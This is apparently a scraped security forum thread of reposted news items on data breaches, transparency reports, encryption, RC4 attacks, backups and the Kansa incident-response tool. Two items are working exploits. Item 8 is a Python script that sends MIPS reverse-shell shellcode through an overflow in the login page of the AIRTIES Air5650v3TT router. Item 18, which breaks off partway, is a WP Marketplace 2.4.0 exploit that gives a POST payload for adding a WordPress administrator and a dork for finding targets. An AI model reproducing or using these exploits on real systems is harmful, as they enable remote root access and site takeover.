overwrites data in other areas. Hackers may also override data with their own malicious code. Security policy template Security policies are, in effect, a strategy to protect web applications and ensure availability at all times. These generally include steps to identify responsibilities, predict threat vectors, and determine prevention & mitigation methodologies. It is essential to define rules for ensuring high availability of applications and minimizing weaknesses. Access and control mechanisms It is common for web applications to lack sufficient authorization checks for people attempting to access their resources. In a secure environment, there should be both role based and user access controls. Organizations should ensure that users can’t bypass ACLs by navigating directly to a file or page. This can be done by setting ACLs to default grant or deny access to authorized users and roles. The IT team can also utilize vetted frameworks and libraries. Access and control should be kept separate, and custom authorization routines should be avoided, as they make the authentication of all necessary channels more challenging. Delineation of responsibilities Never assume there are predefined responsibilities to access files and data stored by web applications. A lot of testing and experience goes into vetted frameworks, encryption algorithms and libraries, so make sure there is a clear description of responsibilities for every user at every possible step. The more default the set of responsibilities, the more difficult it will become to securing the application. Roles and access control are not just for developers, but for all people involved in using web applications. You need to have some delineation of roles with different levels of access for each user. While every organization’s application development program will be different, responsibilities can be handled in different ways or added in different places, and still be effective. Security resources and tools A well-defined policy template includes the use of encryption algorithm for web applications. Users have to determine the data that is valuable enough for encryption, and identify vulnerabilities through threat modeling. Some resources may have to be sacrificed to secure highly sensitive data. Implementations like a web application firewall will safeguard enterprise applications and websites from any cyber threat, so you can avoid costly downtime and data breach attacks. Enterprises are recommended to look for PCI-certified WAF as it protects against Cross-site scripting, SQL injections, and other threats. Some offerings include custom security rules that let you enforce security policies efficiently while eliminating false positives. New solutions are also using crowdsourcing techniques to protect applications with collective knowledge about the modern threat landscape. Threat information is aggregated using big data analytics. Disaster recovery and emergency mechanisms Disaster recovery solutions are required for immediate response to high-risk situations and mitigation strategies must be deployed to limit exposure from an attack. Disaster recovery should be allowed to bypass security assessments and address the risk before a proper assessment can be carried out. Patch releases, on the other hand, are subjected to appropriate level assessment based on the threats to the application architecture and/or functionality. CIOs are the personnel in charge of disaster recovery initiatives. Emergency mechanisms may include steps to take the application off-the-web or stop functionality release into the live environment if multiple threats increase the risk to unacceptable levels. Emergencies should be addressed in a point/patch release unless other mitigation strategies limit exposure. Credentials after patching may be temporarily stored outside of the webroot until the application infrastructure is tested in updated areas of the application environment. Other measures When web applications feature hard-coded credentials, the user can store credentials in the form of hashes to improve security in case the database or the configuration files get breached. Strict ACLs can also be deployed to protect credentials. Enterprises should also use a whitelist of acceptable input commands. If applications are configured to construct SQL queries, but include vulnerabilities that enable hackers to modify these queries, then it is beneficial to avoid dynamic queries, quote arguments, and special characters. The database inputs should be sanitized in general, and there should be strict rules for input validation. Compliance measures and business benefits When it comes to compliance, users who violate this policy should be subjected to a hearing, which may be concluded with a disciplinary action such as termination of employment, depending on the nature of violation. Everyone accessing web applications should undergo assessment as a requirement of a security policy and adhere to the policy unless exempted in certain circumstances. The infrastructure of all applications should be updated to include the security control process. Any web applications that lack appropriate security controls should be taken down for formal assessment, and should not make their way online until the CIO clears them for security integration. All these measures will result in business benefits, such as no loss of productivity during downtimes, and ensure SLAs are met. An enterprise with highly secured web applications will also attract more clients, as they would be better able to protect sensitive customer information. Organizations following the security policy template would also enjoy technical benefits such as high availability and security of data. Both these factors are likely to improve client-wide and industry wide reputation. Lastly, the policy will bridge the gap between good IT practices and enterprise security compliance. Source
  7. When mega-retailer Target was the victim of a data breach during the 2013 holiday season, more than 70 million customers earned that their personal information, including email addresses and credit card numbers, had possibly been compromised. However, there was one small bright spot in the torrent of bad news: Target reported that the PIN numbers for compromised debit cards were encrypted, and therefore useless to the criminals who now had access to them. While that might have been little consolation to those customers who had to spend time locking down their accounts, to Target, it was a major victory in an otherwise bleak situation. Because the retailer did employ encryption to protect certain vital data, they were granted “Safe Harbor” from certain reporting requirements and more importantly, major fines, as a result of the breach. The Target data beach, and the others that have occurred since at retailers like Nordstrom and Home Depot, only serve to underscore the importance of encryption as part of a data protection strategy. While prior to these breaches, businesses that collect customer payment information, including credit and debit card numbers, were required by the Payment Card Industry Data Security Standards (PCI DSS) to encrypt data, many other businesses that store and transmit data via networks had less defined rules regarding encryption. However, that’s all changing. Encryption, once viewed as “extra” protection by many, has become a priority in the ongoing quest to secure data. 3 Top Trends in Data Encryption The fact that encryption has become a bigger priority in the last year is not the only change in the data security universe. In fact, the new emphasis on encryption itself has led to some significant trends. Among them: 1. Key Management Has Become More Complex One of the leading causes of data breaches is the inappropriate management of credentials, and encryption key management falls squarely under the umbrella of credential management. As more enterprises adopt encryption as part of their security protocol, the number of keys that need to be managed has also increased. Vendors that offer encryption as a service are growing more reluctant to be responsible for customer keys, while businesses employing encryption are also finding challenges in maintaining separation between the keys and the encrypted data. 2. Compliance Standards Are Changing While certain regulations, including the PCI DSS and HIPPA already required encryption as a minimum security standard, those regulations are expanding and becoming more stringent. The definition of “sensitive data” is expanding all the time, and organizations that fail to comply with the regulatory standards of their industry could face serious consequences. Many are choosing to err on the side of caution, and employing advanced encryption ahead of regulatory changes. 3. Expectations for Encryption Are Evolving One of the primary reasons that many businesses have resisted encryption — especially small businesses — is that encryption has often been viewed as complex and cumbersome function. Some older (read: a decade or more) encryption solutions did present some hurdles to users, but today’s virtualization security solutions present a seamless alternative. In short, modern encryption technology protects data without any effect on application functionality. Developers are also working toward homomorphic encryption to make the analysis of Big Data more thorough. Currently, most cloud based data analysis tools are not able to work with encrypted data. Businesses must either take the risk of working with unencrypted data in the cloud, or develop their own analytical applications, which increases expense. Homomorphic encryption, however, allows encrypted data to be analyzed just as it would if it were unencrypted. This allows businesses to not only tap into the power of Big Data more securely, it also presents opportunities to analyze data from multiple sources at once, without exposing potentially sensitive information. Even just a few short years ago, encryption was often viewed as a “bonus” security measure, something that enterprises could choose to employ. Believed to be the realm of government agencies and hackers, it was often reserved for the most sensitive data only, and considered unnecessary for the average user. With so much data being shared online, and with the explosive growth of cloud computing, though, encryption has become as commonplace as antivirus protection and firewalls. As adoption grows, expect to see more changes in encryption standards and security management going forward. Source
  8. #!/usr/bin/env python ##################################################################################### # Exploit for the AIRTIES Air5650v3TT # Spawns a reverse root shell # Author: Batuhan Burakcin # Contact: batuhan@bmicrosystems.com # Twitter: @batuhanburakcin # Web: [url]http://www.bmicrosystems.com[/url] ##################################################################################### import sys import time import string import socket, struct import urllib, urllib2, httplib if __name__ == '__main__': try: ip = sys.argv[1] revhost = sys.argv[2] revport = sys.argv[3] except: print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0] host = struct.unpack('>L',socket.inet_aton(revhost))[0] port = string.atoi(revport) shellcode = "" shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd" shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff" shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0" shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\xaf\xae\xff\xe4" shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1] shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3] shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27" shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27" shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c" shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f" shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec" shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab" shellcode += "\x01\x01\x01\x0c" data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48 pdata = { 'redirect' : data, 'self' : '1', 'user' : 'tanri', 'password' : 'ihtiyacmyok', 'gonder' : 'TAMAM' } login_data = urllib.urlencode(pdata) #print login_data url = 'http://%s/cgi-bin/login' % ip header = {} req = urllib2.Request(url, login_data, header) rsp = urllib2.urlopen(req) Source
  9. Snapchat, the social network known for its disappearing messages, released its first transparency report Thursday showing hundreds of requests from US and foreign law enforcement agencies. Between November 1 and February 28, Snapchat said it received 375 requests from US law enforcement officials, and produced at least some data in 92 percent of those cases. "While the vast majority of Snapchatters use Snapchat for fun, it's important that law enforcement is able to investigate illegal activity," Snapchat said in a blog post. "We want to be clear that we comply with valid legal requests." The requests were mostly in the form of subpoenas, warrants or court orders, along with a smaller number of emergency requests. Outside the US, Snapchat received 28 requests and produced data in six of those cases. The requests came from Britain, Belgium, France, Canada, Ireland, Hungary and Norway. Snapchat joins other major tech firms that have released similar data including Google, Yahoo, Facebook, Twitter and Microsoft. Like most of its peers, Snapchat said it opposed efforts to give law enforcement special access through "backdoors." "Privacy and security are core values here at Snapchat and we strongly oppose any initiative that would deliberately weaken the security of our systems," the blog posting said. "We're committed to keeping your data secure and we will update this report bi-annually." The report did not include data on US national security requests, which may only be released after a six-month delay. "Even though Snapchat has promoted user privacy and autonomy since its founding, we've only recently been able to systematically track and report requests for user information," the company said. It said it will publish more details in July on government requests and demands to remove content. Snapchat last year reportedly rejected a $3-billion takeover by Facebook and later was valued at some $10 billion following a private equity round of investment. Snapchat has not disclosed key financial information or numbers of users but some analysts say it is used by as many as 100 million people or more. Snapchat rocketed to popularity, especially among teens, after the initial app was released in September 2011. Created by then Stanford University students, the app allows the sending of messages that disappear shortly after being viewed. Sursa: Snapchat Shows Data Requests in Transparency Report | SecurityWeek.Com
  10. Uber insisted it had not been hacked following the discovery that log-in information for thousands of the car-sharing service's users is widely available on the online black market. Motherboard confirmed last week that several dark Web forums — hidden from the regular internet using the online anonymity software Tor — were selling working log-ins for Uber for as little as $1. Uber denies the information was taken from its own servers, however. “We investigated and found no evidence of a breach,” the company said in a statement. “Attempting to fraudulently access or sell accounts is illegal and we notified the authorities about this report.” An Uber log-in can not only be used to rack up fraudulent trips, but would also give access to the user’s travel history, exposing home addresses. An account also contains partial credit card information. Uber said the log-ins might have been lifted by either breaking weak passwords, or by trying passwords exposed in other data breaches. “This is a good opportunity to remind people to use strong and unique usernames and passwords, and to avoid reusing the same credentials across multiple sites and services,” Uber said. The company’s data security has made headlines in recent months. In late February, it came out that the personal information of up to 50,000 drivers had been compromised during a May 2014 breach. The 2014 hack is not related to the current rash of Uber log-ins for sale, the company said. Source
  11. Facebook is in violation of EU data laws owing to its overly complex privacy policies and persistent tracking of users, even if they have opted out of such systems. This was the key claim in a report by researchers at the University of Leuven and the Free University of Brussels on behalf of the Belgian Privacy Commission. “Our analysis indicates [that] Facebook is acting in violation of European law,” the report said. Specifically, the researchers are concerned that almost all data tracking and monitoring done by Facebook, such as for advertising purposes or gathering location data, is done without giving users adequate control over their privacy. “Its current default settings with regards to behavioural profiling and advertising (essentially 'opt-out') remain problematic,” the report said. “According to the Article 29 Working Party, consent cannot be inferred from the data subject’s inaction with regard to behavioural marketing. “As a result, Facebook’s opt-out system for advertising does not meet the requirements for legally valid consent. In addition, opt-outs for 'Sponsored Stories' or collection of location data are simply not provided.” The way Facebook combines data from its other services, specifically Instagram and WhatsApp, to build a more complete picture of a user was also cited as another way in which Facebook does not adhere to EU privacy and data laws. “Facebook only offers an opt-out system for its users in relation to profiling for third-party advertising purposes. The current practice does not meet the requirements for legally valid consent,” the report said. The report also criticised Facebook for “leveraging its dominant position” in the social networking market to effectively force users to accept its conditions. “The choices Facebook offers to its users are limited. For many data uses, the only choice for users is to simply 'take it or leave it'. If they do not accept, they can no longer use Facebook and may miss out on content exclusively shared on this platform,” the researchers said. Another interesting area raised in the report relates to the rights, or lack of, that Facebook provides to delete an account and have all data removed from the firm's databases. "Facebook fails to provide (sufficient) granularity in exercising data subject’s rights. For example, the right to erasure can only be exercised with regard to the user’s profile and only relates to self-posted content," it said. V3 contacted Facebook for its response to the report but had received no reply at the time of publication. The damning allegations come just a few months after Facebook updated its terms and conditions in an effort to make it easier for people to "take charge" of how their data is used on the site. Source
  12. 31 March is World Backup Day, a chance for us all to avoid being April Fools by making sure we have secure backups of all our most important data. On last year's Backup Day, we provided a rundown of the most basic and important steps you can take to ensure your files can be retrieved in the event of a disaster. Most physical storage media, from hard drives and USB flash drives to CDs and DVDs, are vulnerable to damage from flood, fire, or sudden impact (sometimes even simply dropping them on the floor). That's not to mention having your laptop stolen, losing a USB drive, or indeed corruption or accidental deletion, so having a single copy of your important files is never a good idea. Of course, keeping a second copy right next to the computer holding your main copy is not going to help in the event of a fire or burglary. As a result, a range of online backup services has emerged in recent years, providing handy options for simple, low-cost backups that are shielded from many of the risks of copies stored in your home or office. There are some issues to consider here too, though, especially in terms of privacy. Depending on the service you use and the location of its servers, your data could be open to the prying eyes of government agencies and even hackers, so it's advisable to use strong encryption of your own if you need to upload data to a cloud service while keeping its content private. Make sure access is controlled with strong passwords and 2-factor authentication to keep unwanted people out of your account, and don't forget to pay the subscription fee, as your data may automatically be deleted if your account expires. The ransomware threat When we last covered World Backup Day, ransomware was a relatively new addition to the range of headaches facing us, with CryptoLocker hitting headlines around the world in late 2013. Since then ransomware has become a popular money-making tactic for cybercriminals, evolving multiple variants including CryptoWall and CryptoDefense, and going after iPhone users, gamers and companies' customer databases. Of course, ransomware wasn't invented with CryptoLocker – the AIDS Information Trojan, created in late 1989, was probably the first example of malware that scrambled your data and demanded money to decrypt it. But the inclusion of properly-implemented cryptography in CryptoLocker and its followers - rendering the files it targets for all practical purposes irretrievable without paying up - has turned it from an annoyance into a calamity for those affected. At least, that is, for those without proper backups. Any business should include regular and secure backups as one of its most basic processes, and everyday home users are steadily learning that this applies to them too. At least, that is, for those without proper backups. Any business should include regular and secure backups as one of its most basic processes, and everyday home users are steadily learning that this applies to them too. However, as we've seen, even in settings where you would expect secure computing practices, they're not always in place, with organisations from police departments to entire school districts finding their data locked up and held to ransom. Malicious encryption Having malicious software running on your computer, encrypting files at will, adds a further complication to the backup process. Many ransomware variants don't just scramble your C: drive. They look for any device that can be accessed as if it were a disk drive, including USB drives, network shares and even cloud-based storage, if it is mounted as a directly-accessible network drive. This could result in the double nightmare of having your carefully stowed backups also encrypted and locked up. There's also a risk with more basic scheduled backup systems that your local files could get encrypted, then backed up, overwriting existing "clean" backups so that even if you restore your backup, you are still stuck with scrambled files. Stepped backups So, there's a strong argument for some sort of stepped approach to backing up, using at least two separate backup devices and updating one or the other alternately on a regular basis, checking the integrity of the data stored on them each time. That way, you're reasonably sure you won't lose more than a few days or weeks' worth of data, even in the case of the most devious and long-lasting infection. The main point of World Backup Day is to make sure those of us who have yet to make any sort of effort to secure our data make a start and take those first basic precautions. If you haven't yet backed up any of your stuff, now would be a really good time to get moving. Sursa: https://nakedsecurity.sophos.com
  13. Do you realize how often your smartphone is sharing your location data with various companies? It is more than 5000 times in just two weeks. That is little Shocking but True! A recent study by the security researchers from Carnegie Mellon reveals that a number of smartphone applications collect your location-related data — a lot more than you think. The security researcher released a warning against the alarming approach: "Your location [data] has been shared 5,398 times with Facebook, GO Launcher EX, Groupon and seven other [applications] in the last 14 days." During their study, researchers monitored 23 Android smartphone users for three weeks. First Week - Participants were asked to use their smartphone apps as they would normally do. Second Week - An app called App Ops was installed to monitor and manage the data those apps were using. Third Week - The team of researchers started sending a daily “privacy nudge” alert that would ping participants each time an app requested location-related data. Researchers concluded: Some apps for Android are tracking user's movements every three minutes. Some apps for Android are attempting to collect more data than it needed. Groupon, a deal-of-the-day app, requested one participant's coordinates 1,062 times in two weeks. Weather Channel, a weather report app, asked device location an average 2,000 times, or every 10 minutes. The participants were unaware of how closely they are being tracked by different apps, and many were surprised by the end results. Another participant wrote, "The number (356 times) was huge, unexpected." The research team found that privacy managing software helped manage access to data. When the members granted access to App Ops, they collectively checked their App permissions 51 times and restricted 272 permissions on 76 different apps. Just one of the participants failed to review permissions. As per users mentality, once the participants have made the changes to the app permission, they hardly looked at them after a few days. With the help of App Ops privacy app, in the span of eight days, the participants collectively reviewed app permissions 69 times, blocking 122 additional permissions on about 47 different apps. Ultimately, the team believes that if a user began getting the privacy nudges on a daily basis, they'll definitely go back to their privacy settings and restrict apps that are tracking users more closely. Source
  14. The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols. Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic. Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream. It required attackers to view more than 17 billion (234) separate encryptions of the same data. That was a high bar, particularly given that the attack revealed only limited amounts of plaintext. Still, since the researchers demonstrated the attack could decrypt HTTPS-protected authentication cookies used to access user e-mail accounts, Google and other website operators immediately took notice. Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (226) encryptions, a two-order of magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail. Bar-mitzvah attack A second exploit targeting RC4 was devised by researchers from security firm Imperva and was presented Thursday at the Black Hat security conference in Singapore. The attack uses new ways to exploit the "invariance weakness," a key pattern in RC4 keys that can leak plaintext data into the ciphertext under certain conditions. The weakness first came to light in 2001, and led to the fatal exploit against wired equivalent privacy technology used to encrypt Wi-Fi networks. Given the age of the invariance weakness, Imperva researchers are dubbing their new exploit the "bar-mitzvah attack." "The security of RC4 has been questionable for many years, in particular its initialization mechanisms," Imperva researchers wrote in a research paper that accompanied Thursday's Blackhat talk. "However, only in recent years has this understanding begun translating into a call to retire RC4. In this research, we follow [the 2013 RC4 researchers] and show that the impact of the many known vulnerabilities on systems using RC4 is clearly underestimated." The bar-mitzvah attack requires adversaries to sample about one billion RC4 encryptions to infer a credit card number, password, or authentication cookie key. The known weakness exploited involves a flaw found in one out of every 16 million (224) RC4 keys that leads to "structures" in the "least significant bits" of the keystream. The attack is subject to a significant limitation, however, since the leaky plaintext is contained only in the first 100 bytes of ciphertext. Despite the limitation and the challenge of sampling so many encryptions, the attack may be enough to drastically reduce the cost of doing an exhaustive attack that guesses passwords, credit card numbers or similar data. Rather than try every possible combination, the bar-mitzvah attack allows attackers to hone in on a much smaller number of candidates. The growing body of attacks that defeat SSL and TLS encryption are only one threat facing the system millions of Internet users rely on to encrypt sensitive data and authenticate servers. In 2011 hackers broken into Netherlands-based certificate authority DigiNotar and minted counterfeit credentials for Google and other sensitive Web properties. Earlier this week, shoddy practices at an intermediate CA known as MCS Holdings, allowed its customers to obtain unauthorized certificates for several Google addresses. Poor practices on the part of Microsoft also led to the discovery of misissued certificates, on two separate occasions. “RC4 must die” The TLS protocol has two significant phases. The first "handshaking" phase uses asymmetric encryption to negotiate the symmetric encryption keys to be used by an e-mail or Web server and the connecting end user. During the later "record" phase, the parties use the agreed-upon keys to encrypt data using either the AES block cipher or RC4 stream cipher. The two attacks unveiled this month, combined with the exploit disclosed in 2013, are a strong indication the security of RC4 can't be counted on for much longer and should be phased out in favor of alternative algorithms. Retiring RC4 is proving a challenging proposition. A 2011 attack known as BEAST—short for Browser Exploit Against SSL/TLS—targets an encryption mode known as CBC, or cipher block chaining, which is present in most algorithms except for RC4. After BEAST was demonstrated to pose a credible threat to TLS-protected data in transit many security experts recommended website operators opt for RC4 to blunt the threat. That advice is no longer sound, now that RC4 is under attack, too. Imperva researchers say Web app developers should strongly consider disabling RC4 in all their TLS configurations and tech-savvy end uses should disable RC4 in their Browser settings. In February, the Internet Engineering Task Force submitted a request for comments prohibiting the use of RC4 cipher. Use of RC4 has shrunk from about half of all TLS traffic in 2013 to about 30 percent today, but eliminating it altogether may take years. Hanging in the balance, is the security and confidentiality of millions of Internet users. "RC4 was already looking nervously towards the cliff-edge," Kenny Paterson, a Royal Holloway, University of London professor who helped author last week's research, as well as the 2013 research it built on, wrote in a blog post published last week. "Our work pushes RC4 a significant step closer, leaving it teetering on the brink of oblivion for SSL/TLS. After all, attacks can only get better…" Source
  15. Google want to save its users' bandwidth at home. The company has released a "Data Saver extension for Chrome," bringing its data compression feature for its desktop users for the first time. While tethering to a mobile Hotspot for Internet connection for your laptop, this new Data Saver extension for Chrome helps you reduce bandwidth usage by compressing the pages you visit over the Internet. If you are unaware of it, the data compression proxy service by Google is designed to save users' bandwidth, load pages faster, and increase security (by checking for malicious web pages) on your smartphones and tablets. REDUCE AS MUCH AS 50% OF DATA USAGE Until now, the data compression service has been meant to benefit only mobile users, but the latest Data Saver Chrome Extension aims at helping desktop users by reducing their data usage by as much as 50 percent. When you visit a website, web server delivers the requested files to your browser. If enabled by the server, Gzip compresses web pages and style sheets before sending them over to the browser. Gzip compression drastically reduces transfer time since the files are much smaller. Data Saver Extension for Chrome checks if the website you visited has gzip enabled or not. If not, it compresses the requested web page via Google Data Compression proxy and makes it significantly smaller. AVAILABLE FOR CHROME 41 AND HIGHER The Data Saver Chrome extension currently doesn't support secure SSL pages or incognito pages, and Google notes that users may experience issues when they have enabled the extension. Data Saver is available on Chrome both for Android as well as iOS. User will need Chrome 41 or higher version to use the extension. As soon as you install it, the extension starts to work by default. In case you want to disable it, click on the Data Saver icon in the menu bar and select "Turn Off Data Saver." You can now download Google's new Data Saver extension for Chrome, which is currently in beta version, from the Chrome Web Store. The extension was released on March 23, without any announcement from the search engine giant. Source
  16. Yahoo received nearly 5,000 requests for user data from the United States government in the last six months of 2014 and disclosed some content in nearly 25 percent of those cases. The company said in its new transparency report that it received between 0-999 National Security Letters from the U.S. government, too. The latest report from Yahoo on government requests covers the period of July through December of 2014 and the company reported 4,865 total requests from the U.S. during that period. Those requests covered a total of 9,752 user accounts and the company disclosed some content in 1,157 of those cases. Yahoo rejected 258 of the U.S. government’s requests and disclosed solely non-content data in 2,887 cases. Yahoo defines non-content data as “the information captured at the time of registration such as an alternate e-mail address, name, location, and IP address, login details, billing information, and other transactional information”. The U.S. was by far the most active government in this report, with Taiwan coming in a distant second with 2,081 total requests. Germany sent 1,910 requests to Yahoo and the United Kingdom sent 1,570. In the previous six months, the U.S. sent 6,791 total requests to Yahoo and the company reported the same range of NSLs, 0-999. The government only allows companies to report the number of NSLs they receive in bands of 1,000. Yahoo and other technology companies have been pressuring the government for the ability to report those letters in more specific detail. In addition to the transparency data, Yahoo also provided an update on its efforts to protect users from attacks by governments and other attackers. “We’ve encrypted many of our most important products and services to protect against snooping by governments or other actors. This includes encryption of the traffic moving between Yahoo data centers; making browsing over HTTPS the default on Yahoo Mail and Yahoo Homepage; and implementing the latest in security best-practices, including supporting TLS 1.2, Perfect Forward Secrecy and a 2048-bit RSA key for many of our global properties such as Homepage, Mail and Digital Magazines. We’ve also rolled out an end-to-end (e2e) encryption extension for Yahoo Mail, now available on GitHub. Our goal is to provide an intuitive e2e encryption solution for all of our users by the end of 2015,” the company said in the report. Yahoo released the end-to-end encryption extension last week, something that was the result of an effort that Alex Stamos, the company’s CISO, announced at Black Hat last year. “Just a few years ago, e2e encryption was not widely discussed, nor widely understood. Today, our users are much more conscious of the need to stay secure online,” Stamos wrote on Yahoo’s Tumblr. He said that Yahoo’s extension will satisfy users’ needs to share sensitive information securely. “Wherever you land on the spectrum, we’ve heard you loud and clear: We’re building the best products to ensure a more secure user experience and overall digital ecosystem.” Yahoo, like its counterparts at Google, has been investing in encrypting more and more of its services and infrastructure. Much of this has come in the wake of the Edward Snowden revelations, but some of the efforts were in motion before the leaks about NSA capabilities against the companies’ services began to surface. Source
  17. Aerosol

    Kansa

    A modular incident response framework in Powershell. Note there's a bug that's currently cropping up in PowerShell version 2 systems, but version 3 and later should be fine. More info: trustedsignal -- blog: Kansa PowerShell Magazine » Kansa: A PowerShell-based incident response framework What does it do? It uses Powershell Remoting to run user contributed, ahem, user contri- buted modules across hosts in an enterprise to collect data for use during incident response, breach hunts, or for building an environmental baseline. How do you use it? Here's a very simple command line example you can run on your own local host. After downloading the project and unzipping it, you'll likely need to "unblock" the ps1 files. The easiest way to do this if you're using Powershell v3 or later is to cd to the directory where Kansa resides and do: ls -r *.ps1 | Unblock-File If you're not running PS v3 or later, Sysinternal's Streams utility can be used to remove the alternate data streams that Powershell uses to determine if files came from the Internet. Once you've removed those ADSes, you'll be able to run the scripts without issue. I've not run into any issues running the downloaded scripts via Windows Remote Management / Powershell Remoting through Kansa, so you shouldn't have to do anything if you want to run the scripts via remoting. Open an elevated Powershell Prompt (Right-click Run As Administrator) At the command prompt, enter: .\kansa.ps1 -Target localhost -ModulePath .\Modules -Verbose The script should start collecting data or you may see an error about not having Windows Remote Management enabled. If so, do a little searching online, it's easy to turn on. Turn it on and try again. When it finishes running, you'll have a new Output_timestamp subdirectory, with subdirectories for data collected by each module. You can cd into those subdirectories and checkout the data. There are some analysis scripts in the Analysis directory, but many of those won't make sense on a collection of data from a single host. Kansa was written for collection and analysis of data from dozens, hundreds, thousands, tens of thousands of systems. Running Modules Standalone Kansa modules can be run as standalone utilities outside of the Kansa framework. Why might you want to do this? Consider netstat -naob, the output of the command line utility is ugly and doesn't easily lend itself to analysis. Running Modules\Net\Get-Netstat.ps1 as a standalone script will call netstat -naob, but it will return Powershell objects in an easy to read, easy to analyze format. You can easily convert its output to CSV, TSV or XML using normal Powershell cmdlets. Here's an example: .\Get-Netstat.ps1 | ConvertTo-CSV -Delimiter "`t" -NoTypeInformation | % { $_ -replace "`"" } | Set-Content netstat.tsv the result of the above will be a file called netstat.tsv containing unquoted, tab separate values for netstat -naob's ouput. Caveats: Powershell relies on the Windows API. Your adversary may use subterfuge.* Collectors can be written to bypass the Windows API as well. Get-RekallPslist.ps1 for example. Link: https://github.com/davehull/Kansa
  18. #!/usr/bin/python # # Exploit Name: WP Marketplace 2.4.0 Remote Command Execution # # Vulnerability discovered by Kacper Szurek (http://security.szurek.pl) # # Exploit written by Claudio Viviani # # # # -------------------------------------------------------------------- # # The vulnerable function is located on "wpmarketplace/libs/cart.php" file: # # function ajaxinit(){ # if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ # if(function_exists($_POST['execute'])) # call_user_func($_POST['execute'],$_POST); # else # echo __("function not defined!","wpmarketplace"); # die(); # } #} # # Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook). # wpmp_pp_ajax_call() call functions by call_user_func() through POST data: # # if (function_exists($_POST['execute'])) # call_user_func($_POST['execute'], $_POST); # else # ... # ... # ... # # $_POST data needs to be an array # # # The wordpress function wp_insert_user is perfect: # # http://codex.wordpress.org/Function_Reference/wp_insert_user # # Description # # Insert a user into the database. # # Usage # # <?php wp_insert_user( $userdata ); ?> # # Parameters # # $userdata # (mixed) (required) An array of user data, stdClass or WP_User object. # Default: None # # # # Evil POST Data (Add new Wordpress Administrator): # # action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator # # --------------------------------------------------------------------- # # Dork google: index of "wpmarketplace" # # Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6 # # Http connection import urllib, urllib2, socket # import sys # String manipulator import string, random # Args management import optparse # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ __ __ __ | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----. |. | _ | _| <| -__| _| _ | | _ | __| -__| |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| |: | | |__| |::.|:. | `--- ---' WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) v2.4.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target: print(banner) commandList.print_help() sys.exit(1) host = checkurl(options.target) timeout = options.timeout print(banner) 